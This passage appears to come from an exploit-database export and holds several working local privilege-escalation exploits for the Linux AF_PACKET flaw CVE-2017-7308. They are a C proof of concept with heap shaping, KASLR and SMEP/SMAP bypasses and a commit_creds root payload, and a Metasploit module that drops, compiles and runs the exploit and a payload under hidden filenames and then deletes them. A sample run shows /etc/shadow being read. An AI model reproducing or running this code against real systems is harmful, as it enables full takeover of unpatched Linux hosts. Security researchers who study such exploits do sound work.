start_comm[16]; /* 56 16 */\r\n};\r\n \r\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\r\n#define TIMER_OFFSET 896\r\n \r\n// pakcet_sock->xmit\r\n#define XMIT_OFFSET 1304\r\n \r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n \r\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\r\n unsigned int frame_size, unsigned int block_nr,\r\n unsigned int sizeof_priv, unsigned int timeout) {\r\n int v = TPACKET_V3;\r\n int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\r\n if (rv < 0) {\r\n perror(\"[-] setsockopt(PACKET_VERSION)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n struct tpacket_req3 req;\r\n memset(&req, 0, sizeof(req));\r\n req.tp_block_size = block_size;\r\n req.tp_frame_size = frame_size;\r\n req.tp_block_nr = block_nr;\r\n req.tp_frame_nr = (block_size * block_nr) / frame_size;\r\n req.tp_retire_blk_tov = timeout;\r\n req.tp_sizeof_priv = sizeof_priv;\r\n req.tp_feature_req_word = 0;\r\n \r\n rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\r\n if (rv < 0) {\r\n perror(\"[-] setsockopt(PACKET_RX_RING)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\r\n unsigned int block_nr, unsigned int sizeof_priv, int timeout) {\r\n int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\r\n if (s < 0) {\r\n perror(\"[-] socket(AF_PACKET)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,\r\n sizeof_priv, timeout);\r\n \r\n struct sockaddr_ll sa;\r\n memset(&sa, 0, sizeof(sa));\r\n sa.sll_family = PF_PACKET;\r\n sa.sll_protocol = htons(ETH_P_ALL);\r\n sa.sll_ifindex = if_nametoindex(\"lo\");\r\n sa.sll_hatype = 0;\r\n sa.sll_pkttype = 0;\r\n sa.sll_halen = 0;\r\n \r\n int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\r\n if (rv < 0) {\r\n perror(\"[-] bind(AF_PACKET)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n return s;\r\n}\r\n \r\nvoid packet_socket_send(int s, char *buffer, int size) {\r\n struct sockaddr_ll sa;\r\n memset(&sa, 0, sizeof(sa));\r\n sa.sll_ifindex = if_nametoindex(\"lo\");\r\n sa.sll_halen = ETH_ALEN;\r\n \r\n if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\r\n sizeof(sa)) < 0) {\r\n perror(\"[-] sendto(SOCK_RAW)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid loopback_send(char *buffer, int size) {\r\n int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\r\n if (s == -1) {\r\n perror(\"[-] socket(SOCK_RAW)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n packet_socket_send(s, buffer, size);\r\n}\r\n \r\nint packet_sock_kmalloc() {\r\n int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n if (s == -1) {\r\n perror(\"[-] socket(SOCK_DGRAM)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return s;\r\n}\r\n \r\nvoid packet_sock_timer_schedule(int s, int timeout) {\r\n packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\r\n}\r\n \r\nvoid packet_sock_id_match_trigger(int s) {\r\n char buffer[16];\r\n packet_socket_send(s, &buffer[0], sizeof(buffer));\r\n}\r\n \r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n \r\n#define ALIGN(x, a) __ALIGN_KERNEL((x), (a))\r\n#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\r\n#define __ALIGN_KERNEL_MASK(x, mask) (((x) + (mask)) & ~(mask))\r\n \r\n#define V3_ALIGNMENT (8)\r\n#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\r\n \r\n#define ETH_HDR_LEN sizeof(struct ethhdr)\r\n#define IP_HDR_LEN sizeof(struct iphdr)\r\n#define UDP_HDR_LEN sizeof(struct udphdr)\r\n \r\n#define UDP_HDR_LEN_FULL (ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\r\n \r\nint oob_setup(int offset) {\r\n unsigned int maclen = ETH_HDR_LEN;\r\n unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\r\n (maclen < 16 ? 16 : maclen));\r\n unsigned int macoff = netoff - maclen;\r\n unsigned int sizeof_priv = (1u<<31) + (1u<<30) +\r\n 0x8000 - BLK_HDR_LEN - macoff + offset;\r\n return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\r\n}\r\n \r\nvoid oob_write(char *buffer, int size) {\r\n loopback_send(buffer, size);\r\n}\r\n \r\nvoid oob_timer_execute(void *func, unsigned long arg) {\r\n oob_setup(2048 + TIMER_OFFSET - 8);\r\n \r\n int i;\r\n for (i = 0; i < 32; i++) {\r\n int timer = packet_sock_kmalloc();\r\n packet_sock_timer_schedule(timer, 1000);\r\n }\r\n \r\n char buffer[2048];\r\n memset(&buffer[0], 0, sizeof(buffer));\r\n \r\n struct timer_list *timer = (struct timer_list *)&buffer[8];\r\n timer->function = func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n \r\n oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\r\n \r\n sleep(1);\r\n}\r\n \r\nvoid oob_id_match_execute(void *func) {\r\n int s = oob_setup(2048 + XMIT_OFFSET - 64);\r\n \r\n int ps[32];\r\n \r\n int i;\r\n for (i = 0; i < 32; i++)\r\n ps[i] = packet_sock_kmalloc();\r\n \r\n char buffer[2048];\r\n memset(&buffer[0], 0, 2048);\r\n \r\n void **xmit = (void **)&buffer[64];\r\n *xmit = func;\r\n \r\n oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\r\n \r\n for (i = 0; i < 32; i++)\r\n packet_sock_id_match_trigger(ps[i]);\r\n}\r\n \r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n \r\nvoid kmalloc_pad(int count) {\r\n int i;\r\n for (i = 0; i < count; i++)\r\n packet_sock_kmalloc();\r\n}\r\n \r\nvoid pagealloc_pad(int count) {\r\n packet_socket_setup(0x8000, 2048, count, 0, 100);\r\n}\r\n \r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n \r\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n \r\nvoid get_root_payload(void) {\r\n ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(\r\n ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)\r\n );\r\n}\r\n \r\n// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *\r\n \r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n \r\nunsigned long get_kernel_addr() {\r\n int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n if (size == -1) {\r\n perror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n size = (size / getpagesize() + 1) * getpagesize();\r\n char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\r\n MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\r\n if (size == -1) {\r\n perror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n const char *needle1 = \"Freeing SMP\";\r\n char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) {\r\n fprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle1);\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n for (size = 0; substr[size] != '\\n'; size++);\r\n \r\n const char *needle2 = \"ffff\";\r\n substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\r\n if (substr == NULL) {\r\n fprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle2);\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n char *endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n \r\n r &= 0xfffffffffff00000ul;\r\n r -= 0x1000000ul;\r\n \r\n return r;\r\n}\r\n \r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n \r\nvoid exec_shell() {\r\n char *shell = \"/bin/bash\";\r\n char *args[] = {shell, \"-i\", NULL};\r\n execve(shell, args, NULL);\r\n}\r\n \r\nvoid fork_shell() {\r\n pid_t rv;\r\n \r\n rv = fork();\r\n if (rv == -1) {\r\n perror(\"[-] fork()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (rv == 0) {\r\n exec_shell();\r\n }\r\n}\r\n \r\nbool is_root() {\r\n // We can't simple check uid, since we're running inside a namespace\r\n // with uid set to 0. Try opening /etc/shadow instead.\r\n int fd = open(\"/etc/shadow\", O_RDONLY);\r\n if (fd == -1)\r\n return false;\r\n close(fd);\r\n return true;\r\n}\r\n \r\nvoid check_root() {\r\n printf(\"[.] checking if we got root\\n\");\r\n \r\n if (!is_root()) {\r\n printf(\"[-] something went wrong =(\\n\");\r\n return;\r\n }\r\n \r\n printf(\"[+] got r00t ^_^\\n\");\r\n \r\n // Fork and exec instead of just doing the exec to avoid potential\r\n // memory corruptions when closing packet sockets.\r\n fork_shell();\r\n}\r\n \r\nbool write_file(const char* file, const char* what, ...) {\r\n char buf[1024];\r\n va_list args;\r\n va_start(args, what);\r\n vsnprintf(buf, sizeof(buf), what, args);\r\n va_end(args);\r\n buf[sizeof(buf) - 1] = 0;\r\n int len = strlen(buf);\r\n \r\n int fd = open(file, O_WRONLY | O_CLOEXEC);\r\n if (fd == -1)\r\n return false;\r\n if (write(fd, buf, len) != len) {\r\n close(fd);\r\n return false;\r\n }\r\n close(fd);\r\n return true;\r\n}\r\n \r\nvoid setup_sandbox() {\r\n int real_uid = getuid();\r\n int real_gid = getgid();\r\n \r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n perror(\"[-] unshare(CLONE_NEWUSER)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (unshare(CLONE_NEWNET) != 0) {\r\n perror(\"[-] unshare(CLONE_NEWUSER)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n perror(\"[-] write_file(/proc/self/set_groups)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n if (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n perror(\"[-] write_file(/proc/self/uid_map)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n if (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n perror(\"[-] write_file(/proc/self/gid_map)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n cpu_set_t my_set;\r\n CPU_ZERO(&my_set);\r\n CPU_SET(0, &my_set);\r\n if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n perror(\"[-] sched_setaffinity()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (system(\"/sbin/ifconfig lo up\") != 0) {\r\n perror(\"[-] system(/sbin/ifconfig lo up)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nint main() {\r\n printf(\"[.] starting\\n\");\r\n \r\n setup_sandbox();\r\n \r\n printf(\"[.] namespace sandbox set up\\n\");\r\n \r\n#if ENABLE_KASLR_BYPASS\r\n printf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n KERNEL_BASE = get_kernel_addr();\r\n printf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n \r\n printf(\"[.] commit_creds: %lx\\n\", KERNEL_BASE + COMMIT_CREDS);\r\n printf(\"[.] prepare_kernel_cred: %lx\\n\", KERNEL_BASE + PREPARE_KERNEL_CRED);\r\n \r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n printf(\"[.] native_write_cr4: %lx\\n\", KERNEL_BASE + NATIVE_WRITE_CR4);\r\n#endif\r\n \r\n printf(\"[.] padding heap\\n\");\r\n kmalloc_pad(KMALLOC_PAD);\r\n pagealloc_pad(PAGEALLOC_PAD);\r\n printf(\"[.] done, heap is padded\\n\");\r\n \r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n printf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\r\n oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\r\n printf(\"[.] done, SMEP & SMAP should be off now\\n\");\r\n#endif\r\n \r\n printf(\"[.] executing get root payload %p\\n\", &get_root_payload);\r\n oob_id_match_execute((void *)&get_root_payload);\r\n printf(\"[.] done, should be root now\\n\");\r\n \r\n check_root();\r\n \r\n while (1) sleep(1000);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27761"}, {"lastseen": "2018-05-18T22:38:02", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-05-18T00:00:00", "title": "Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2018-05-18T00:00:00", "id": "1337DAY-ID-30376", "href": "https://0day.today/exploit/description/30376", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a heap-out-of-bounds write in the packet_set_ring\r\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\r\n to execute code as root (CVE-2017-7308).\r\n \r\n The bug was initially introduced in 2011 and patched in version 4.10.6,\r\n potentially affecting a large number of kernels; however this exploit\r\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\r\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\r\n \r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n \r\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\r\n may crash the kernel.\r\n \r\n This module has been tested successfully on Linux Mint 18 (x86_64)\r\n with kernel versions:\r\n \r\n 4.8.0-34-generic;\r\n 4.8.0-36-generic;\r\n 4.8.0-39-generic;\r\n 4.8.0-41-generic;\r\n 4.8.0-42-generic;\r\n 4.8.0-44-generic;\r\n 4.8.0-45-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Andrey Konovalov', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Mar 29 2017',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'EDB', '41994' ],\r\n [ 'CVE', '2017-7308' ],\r\n [ 'BID', '97234' ],\r\n [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],\r\n [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],\r\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],\r\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n \r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n \r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n write_file path, data\r\n end\r\n \r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n \r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n \r\n output = cmd_exec gcc_cmd\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n \r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n \r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n \r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n \r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n \r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n \r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.8\\.0-(34|36|39|41|42|44|45)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n \r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n \r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n \r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n \r\n if kptr_restrict? && dmesg_restrict?\r\n vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'\r\n return CheckCode::Safe\r\n end\r\n \r\n CheckCode::Appears\r\n end\r\n \r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n \r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n \r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('poc.c')\r\n rm_f \"#{executable_path}.c\"\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('exploit')\r\n end\r\n \r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n \r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec \"#{executable_path} #{payload_path}\"\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status 'Deleting executable...'\r\n rm_f executable_path\r\n Rex.sleep 5\r\n print_status 'Deleting payload...'\r\n rm_f payload_path\r\n end\r\nend\n\n# 0day.today [2018-05-18] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30376"}, {"lastseen": "2019-12-04T04:01:03", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-07-26T00:00:00", "title": "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2019-07-26T00:00:00", "id": "1337DAY-ID-33035", "href": "https://0day.today/exploit/description/33035", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\r\n// Includes a SMEP & SMAP bypass.\r\n// Tested on Ubuntu / Linux Mint:\r\n// - 4.8.0-34-generic\r\n// - 4.8.0-36-generic\r\n// - 4.8.0-39-generic\r\n// - 4.8.0-41-generic\r\n// - 4.8.0-42-generic\r\n// - 4.8.0-44-generic\r\n// - 4.8.0-45-generic\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\r\n//\r\n// Usage:\r\n// [email\u00a0protected]:~$ uname -a\r\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\r\n// [email\u00a0protected]:~$ gcc pwn.c -o pwn\r\n// [email\u00a0protected]:~$ ./pwn \r\n// [.] starting\r\n// [.] system has 2 processors\r\n// [.] checking kernel version\r\n// [.] kernel version '4.8.0-41-generic' detected\r\n// [~] done, version looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [.] done, kernel text: ffffffff87000000\r\n// [.] commit_creds: ffffffff870a5cf0\r\n// [.] prepare_kernel_cred: ffffffff870a60e0\r\n// [.] native_write_cr4: ffffffff87064210\r\n// [.] padding heap\r\n// [.] done, heap is padded\r\n// [.] SMEP & SMAP bypass enabled, turning them off\r\n// [.] done, SMEP & SMAP should be off now\r\n// [.] executing get root payload 0x401516\r\n// [.] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// [email\u00a0protected]:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <[email\u00a0protected]>\r\n// ---\r\n// Updated by <[email\u00a0protected]>\r\n// - support for systems with SMEP but no SMAP\r\n// - check number of CPU cores\r\n// - additional kernel targets\r\n// - additional KASLR bypasses\r\n// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <assert.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sched.h>\r\n\r\n#include <sys/ioctl.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/types.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <netinet/if_ether.h>\r\n#include <net/if.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_SMAP_BYPASS\t\t1\r\n\r\nchar *SHELL = \"/bin/bash\";\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = \t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t native_write_cr4;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x64210 },\r\n\t{ \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x64210 },\r\n\t{ \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-42-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-44-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n\t{ \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n#define NATIVE_WRITE_CR4\t\t(KERNEL_BASE + kernels[kernel].native_write_cr4)\r\n\r\n// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS\r\nunsigned long CR4_DESIRED_VALUE =\t0x406e0ul;\r\n\r\n#define KMALLOC_PAD\t\t\t512\r\n#define PAGEALLOC_PAD\t\t\t1024\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\ntypedef uint32_t u32;\r\n\r\n// $ pahole -C hlist_node ./vmlinux\r\nstruct hlist_node {\r\n\tstruct hlist_node * next; /* 0 8 */\r\n\tstruct hlist_node * * pprev; /* 8 8 */\r\n};\r\n\r\n// $ pahole -C timer_list ./vmlinux\r\nstruct timer_list {\r\n\tstruct hlist_node entry; /* 0 16 */\r\n\tlong unsigned int expires; /* 16 8 */\r\n\tvoid (*function)(long unsigned int); /* 24 8 */\r\n\tlong unsigned int data; /* 32 8 */\r\n\tu32 flags; /* 40 4 */\r\n\tint start_pid; /* 44 4 */\r\n\tvoid * start_site; /* 48 8 */\r\n\tchar start_comm[16]; /* 56 16 */\r\n};\r\n\r\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\r\n#define TIMER_OFFSET\t896\r\n\r\n// pakcet_sock->xmit\r\n#define XMIT_OFFSET\t1304\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\r\n\t\tunsigned int frame_size, unsigned int block_nr,\r\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\r\n\tint v = TPACKET_V3;\r\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] setsockopt(PACKET_VERSION)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct tpacket_req3 req;\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.tp_block_size = block_size;\r\n\treq.tp_frame_size = frame_size;\r\n\treq.tp_block_nr = block_nr;\r\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\r\n\treq.tp_retire_blk_tov = timeout;\r\n\treq.tp_sizeof_priv = sizeof_priv;\r\n\treq.tp_feature_req_word = 0;\r\n\r\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] setsockopt(PACKET_RX_RING)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\r\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\r\n\tif (s < 0) {\r\n\t\tdprintf(\"[-] socket(AF_PACKET)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\r\n\t\tsizeof_priv, timeout);\r\n\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_family = PF_PACKET;\r\n\tsa.sll_protocol = htons(ETH_P_ALL);\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_hatype = 0;\r\n\tsa.sll_pkttype = 0;\r\n\tsa.sll_halen = 0;\r\n\r\n\tint rv = 